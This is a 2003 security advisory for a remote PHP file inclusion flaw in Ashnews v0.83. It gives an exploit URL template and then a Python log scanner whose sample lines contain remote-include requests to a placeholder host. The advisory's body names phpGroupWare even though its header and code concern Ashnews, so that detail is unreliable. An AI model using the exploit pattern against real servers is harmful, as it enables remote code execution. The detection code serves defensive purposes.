######################################################
##        Name: Phil Dunn                           ##
##       Email: z3hp@yahoo.com                      ##
##        Date: July - 20 - 2003                    ##
##     Program: Ashnews v0.83                       ##
##     Version: v0.83                               ##
## Vendor Name: AshWebStudio                        ##
##  Vendor URL: http://projects.ashwebstudio.com/   ##
######################################################

An include file vulnerability was found in phpGroupWare. This exploit works for all branches.

A remote user can create arbitrary PHP code and host it on a remote server. Then, the remote user can issue a specially crafted URL to the target server that specifies the remote PHP code for inclusion.

ashnews.php & ashheadlines.php @ line 14
-----------------------------------------------
include($pathtoashnews."ashprojects/newsconfig.php");
-----------------------------------------------

Exploit:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
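
Added example (not part of the original advisory and not Ashnews code): a Python check for web server access logs that flags requests to the two affected scripts carrying a pathtoashnews query parameter. The log lines are constructed samples; treating any client-supplied pathtoashnews as suspicious and reading "remote location" as an http(s) or ftp(s) URL are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPTS = {"ashnews.php", "ashheadlines.php"}   # files named in the advisory
PARAM = "pathtoashnews"                         # variable used in the include
# Assumption: "remote location" means an http(s) or ftp(s) URL.
REMOTE = re.compile(r"\s*(?:https?|ftps?)://", re.I)
# Request field of Common/Combined Log Format: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return None, 'param-present' or 'remote-include' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    script = unquote(target.path).rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    verdict = None
    # parse_qsl percent-decodes names and values once, as the server would.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != PARAM:
            continue
        # Decode a second time so double-encoded values are still recognised.
        if REMOTE.match(unquote(value)):
            return "remote-include"
        verdict = "param-present"   # assumption: clients never need to send it
    return verdict

def scan(lines):
    """Return (index, verdict) for every flagged line."""
    hits = ((i, classify(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in hits if v]

# Constructed sample log lines (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jul/2003:10:01:00 +0000] "GET /news/ashnews.php HTTP/1.0" 200 5120',
    '192.0.2.44 - - [20/Jul/2003:10:02:13 +0000] "GET /news/ashnews.php?pathtoashnews=http://files.example.invalid/ HTTP/1.0" 200 312',
    '192.0.2.44 - - [20/Jul/2003:10:02:40 +0000] "GET /news/ashheadlines.php?pathtoashnews=%2568ttp%3A%2F%2Ffiles.example.invalid%2F HTTP/1.0" 200 312',
    '192.0.2.51 - - [20/Jul/2003:10:03:05 +0000] "GET /news/ashnews.php?id=4&pathtoashnews=../ HTTP/1.0" 200 98',
    '192.0.2.60 - - [20/Jul/2003:10:04:00 +0000] "GET /index.php?pathtoashnews=http://files.example.invalid/ HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_LOG):
        print(verdict, SAMPLE_LOG[index])
```

Access logs record only the request line, so this covers the URL form shown in the advisory.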